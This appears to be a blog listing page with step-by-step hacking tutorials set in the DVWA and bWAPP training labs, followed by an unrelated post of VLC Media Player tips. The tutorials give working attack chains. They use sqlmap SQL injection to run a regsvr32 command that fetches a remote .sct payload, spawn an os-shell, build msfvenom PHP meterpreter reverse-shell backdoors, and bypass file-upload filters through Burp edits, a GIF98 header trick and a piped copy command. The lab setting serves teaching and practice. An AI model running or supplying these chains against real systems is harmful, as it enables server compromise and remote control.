Showing posts with label Best of Hacking. Show all posts
Showing posts with label Best of Hacking. Show all posts

Command Injection Exploitation through SQL Injection using Sqlmap in DVWA

In this article we will see how to perform command injection using sqlmap and try to execute any cmd command through sqlmap if web server is having sql vulnerability.

Requirement:
Xampp/Wamp Server                                                                                                           
DVWA Lab
Kali Linux: Burp suite, sqlmap tool             

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here
Now open the DVWA in your pc and login with following credentials:
Username – admin
Password – password

Click on DVWA Security and set Website Security Level low


From the list of vulnerability select SQL Injection for your attack. Type user ID: 1 in text box.  Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.  


Turn on burp suite click on proxy in menu bar and go for intercept is on button. Come back and click on submit button in dvwa. Burp suit will provide” cookie” and “referrer” under fetched data which will later use in sqlmap commands.


Lets enumerate all databases name using “refrere and cookies” under sqlmap command.
sqlmap -u “http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” –cookie=” security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2 ″  –dbs


Notice the image given below it has dumped all names of database. Now we are going to choose  dvwa for command injection attack.


Now open another terminal for metasploit framework and Type msfconsole.

This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts a .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH).
 Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.

msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvport 5555
msf exploit(regsvr32_applocker_bypass_server) > exploit

Above module will generate a malicious code as dll file. Copy the selected part for dll file and then run this malicious code using sqlmap comand.


Now we’re going to execute dll file through CMD command using sqlmap therefore paste above malicious code in sqlmap command as shown in the image given below.

sqlmap -u “http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” –cookie=” security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2 ″  -D dvwa --os-cmd="regsvr32 /s /n /u /i:http://192.168.0.104:5555/AVM0rtWSE.sct scrobj.dll"


Then type4 for php payload and type 1 for common location to upload payload as backdoor in victim PC.


As soon as the command will execute come back to metasploit framework and you will get meterpreter session 1 opened.
Type sessions –I 1
Meterpreter>sysinfo

Shell uploading through sql Injection using Sqmap in bWAPP


Shell Uploading in Web Server Using Sqlmap
Hey Guys!! You may have used sqlmap multiple times for sql injection to get database information of the web server. Here in this tutorial I will show you “how to upload any backdoor to get meterpreter session” if the website is suffering from sql vulnerability.
Table of Content
§  DVWA Lab Set-Up
§  Navigate to page Vulnerable to SQL injection
§  Intercept the Browser Request (Burp-suite)
§  Save Intercept data in a text file
§  Extracting database name (SQLMAP)
§  Spawning os-shell (SQLMAP)
§  Explore file Stager in the browser
§  Generating PHP backdoor (msfvenom)
§  Run Multi-handler (Metasploit)
§  Upload Msfvenom PHP Backdoor and execute
§  Obtain Meterpreter Shell

DVWA Lab Set-Up

Requirement:
Xampp/Wamp Server
DVWA web vulnerable application
Kali Linux: Burp suite, sqlmap tool

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here

Navigate to Page Vulnerable to SQL Injection

Now let’s neviagte to DVWA thorugh web browser and login with following credentials:
Username – admin
Password – password
Click on DVWA Security and set Website Security Level low
From the list of vulnerability select SQL Injection for your attack. Type user ID: 1 in text box.  Don’t click on submit button without setting web browser proxy. Set your browser proxy to make burp suite work properly.  



Intercept the Browser Request

Now let’s intercept the browser request with the following steps:
§  After setting Network Proxy in the web browser then turn on burp suite.
§  Click on proxy in menu bar then go for intercept is on button.
§  Come back and click on submit button in dvwa.
§  Copy the intercepted data and save in a text file.

The Intercept button is used to display HTTP and Web Sockets messages that pass between your browser and web servers. Burp suit will provide” cookie” and “referrer” under fetched data which can be used in sqlmap commands directly.


Extracting Database Name

Now use sqlmap for SQL injection and run the following command to enumerate database name.
sqlmap -r file --dbs --batch
Here -r option use to analyze HTTP request from “file” and as you can observe it has dump DVWA as the database name.

Spawning os-shell
Now Type following command to run sqlmap to access os-shell of web server (dvwa)
sqlmap -r file -D dvwa --os-shell
It will try to generate a backdoor; if you want to upload PHP backdoor inside the web server then type 4 for PHP payload.

Type 4 for brute force search to use as writable directory to upload it.
It is trying to upload the file on “/xampp/htdocs/” by using sql injection techniques. As soon as file is uploaded; it will send INFO “the file stager has been successfully uploaded on /xampp/htdocs/”and you will get os-shell of victim pc. Other than here it also shows the path of file stager where you can manually upload your backdoor, look at over highlighted URL:
http://192.168.1.105:80/tmpurufu.php

Explore File Stager in the Browser
Explore the URL:http://192.168.1.105/tmpurufu.php in the browser. From the given below screenshot you can read the heading of web page “sqlmap file uploader which will let you to browse you backdoor on web server(dvwa) and later we can upload that backdoor at /xampp/htdocs/ directory of the web server.
Generating PHP Backdoor
Let’s prepare the malicious php file with msfvenom that we can upload:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.109 lport=4444 -f raw
Copy the code from shell.php
on the desktop and will later browser this file to upload on web server. On other hand load the metasploit framework by typing msfconsole and start multi/handle.


Upload & Execute Msfvenom PHP Backdoor

Click on browse tab to select your backdoor file (shell.php) file and then click on upload.
GREAT!!!  Here it shows Admin File is uploaded which means backdoor shell.php is uploaded.


To execute the backdoor file on the target machine, run URL:192.168.1.105/shell.php in the browser and you will receive reverse connection through multi/handler.

Obtain Meterpreter Shell

msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.1.109
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
meterpreter>sysinfo

Divine!!!  Here we have got our meterpreter session 1.


Hack File upload Vulnerability in DVWA (Bypass All Security)

File upload vulnerability are a major problem with web based applications. In many web server this vulnerability depend entirely on purpose that allows an attacker to upload a file hiding malicious code inside that can then be executed on the server. An attacker might be able to put a phishing page into the website or deface the website.

Attacker may reveal internal information of web server to other and some chances to sensitive data might be informal, by unauthorized people.

In DVWA the webpage allows user to upload an image, and the webpage go through with program coding and checks if the last characters of the file is '.jpg' or '.jpeg' or ’.png’ before allowing the image get uploaded in directory.

Requirement:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp suite, metasploit framework

Install DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your browser with your local IP as 192.168.1.102:81/DVWA and login with following credentials:

Username – admin
Password – password

Bypass Low Level Security


Click on DVWA Security and set Website Security Level low


Open terminal in kali linux and create php backdoor through following command
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
Copy and paste the highlighted code in leafnod and save as with PHP extension as hack.php on the desktop.


Come back to your DVWA lab and click to file upload option from vulnerability menu.
Now click to browse button to browse hack.php file to upload it on web server and click on upload which will upload your file in directory of server.


After uploading a PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and past it in URL to execute it.
hackable/uploads/hack.php


Before executing this URL on browser start and run multi handler in metasploit framework using below command. While the multi handler will run execute the below URL of PHP file in browser. This’ll provide you a meterpreter session 1.
192.168.1.102:81/DVWA/hackable/uploads/hack.php


msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 3333
msf exploit(handler) > run
meterpreter > sysinfo


Bypass Medium Level Security

Click on DVWA Security and set Website Security Level medium


Same process to create php backdoor.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
Now Save the selected code as raj.php.jpeg on desktop. Since this file will get upload in medium security which is little different from low security as this will apparently check the extension of file.


Come back to your DVWA lab and click to file upload option from vulnerability menu.
Again click to browse button to browse raj.php.jpeg file to upload it. Now start burp suit and make intercept on under proxy tab.  Don’t forget to set manual proxy of your browser and click on upload.


Intercept tab will work to catch post method when you click to upload button.  Now convert raj.php.jpeg into raj.php


Compare the change before uploading your PHP file. After altering click on forward to upload PHP file in directory


This will show the path of uploaded file of the directory where file is successfully uploaded.
hackable/uploads/raj.php


Now repeat the whole process same as in low security to execute PHP file in URL.
192.168.1.102:81/DVWA/hackable/uploads/raj.php


This’ll provide a meterpreter session 2 when you run URL in browser.

meterpreter > sysinfo


Bypass High Level Security

Click on DVWA Security and set Website Security Level High


msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw


Now Save the selected code as shell.jpeg on desktop. Since this file will get upload in high security which is little different from low and medium security as this will apparently check the extension of file as well as piece of code also therefore type GIF98 before PHP code and save as shell.jpeg.


Repeat the process to browse shell.jpeg


Again you will directory path of uploaded file.

This PHP file cannot directly execute on URL as it uploaded with jpeg extension. For rename this file into PHP file click to command injection option from vulnerability. Here this vulnerability let you copy and rename this shell.jpeg into PHP file. Types following in text box which will copied and rename shell.jpeg into aa.php

|copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php

When you will submit the command the PHP file get copied with new name as aa.php


Now repeat the process to execute PHP file in URL.
192.168.1.102:81/DVWA/hackable/uploads/aa.php


Wonderful!! Here we get meterpreter session 3 also.
meterpreter > sysinfo

Best of VLC Media Player Tricks (Part 2)

How to Play Multiple Video in VLC

Open the VLC media player.
Go to the Tool Tab present in the menu bar of the media player, and then select Preferences.


Open the Interface Settings then select Allow only one instance from Instances and then save.


Now you can enqueue any number of items in the playlist and keep playing the current item.The items will be played in the regular succession without gap as stored in the playlist.

How to Add Your Images and Text in VLC
Open the VLC Media Player
Select Effects and Filters from the Tool Tab present in the menu bar of the Media Player.


Now go to Video effects > Overlay,

(a) Select Add logo to add the desired image in the VLC Media Player, Browse the image from (. . .) and adjust its transparency level and position on the screen.

(b) Select Add text; enter the text you want to provide and also its position.


We can see the image and text entered in the selected position while playing the video.


How to Rotate Video using VLC
Open the VLC Media Player
Go to the Menu Bar; select Tools > Effects and Filters.


Now go to Video Effects > Geometry, select Transform and Rotate and adjust the Angle of Rotation.


Now we will get the rotated video as per the angle of rotation similar to the given below.



How to Extract Audio Track from DVD
Play the DVD in the VLC Media Player.


Now the DVD will start playing in the VLC Media Player. Suppose we have to extract the audio track of Jaws 3, this particular movie is positioned at 3.


 Go to the Menu Bar; select Media > Convert/Save.


Open the Disc option, enter the title number i.e the number at which that particular video is located, then select Convert/Save.


Browse the Destination file, change the Profile Settings i.e Audio-MP3 and then select Start.


It will start extracting the Audio Track of that particular video.

AUTHOR-This article is written by NUPUR KUMARI who is perusing Bachelor’s degree in Information Technology from Bhopal. She has the interest in Web Security.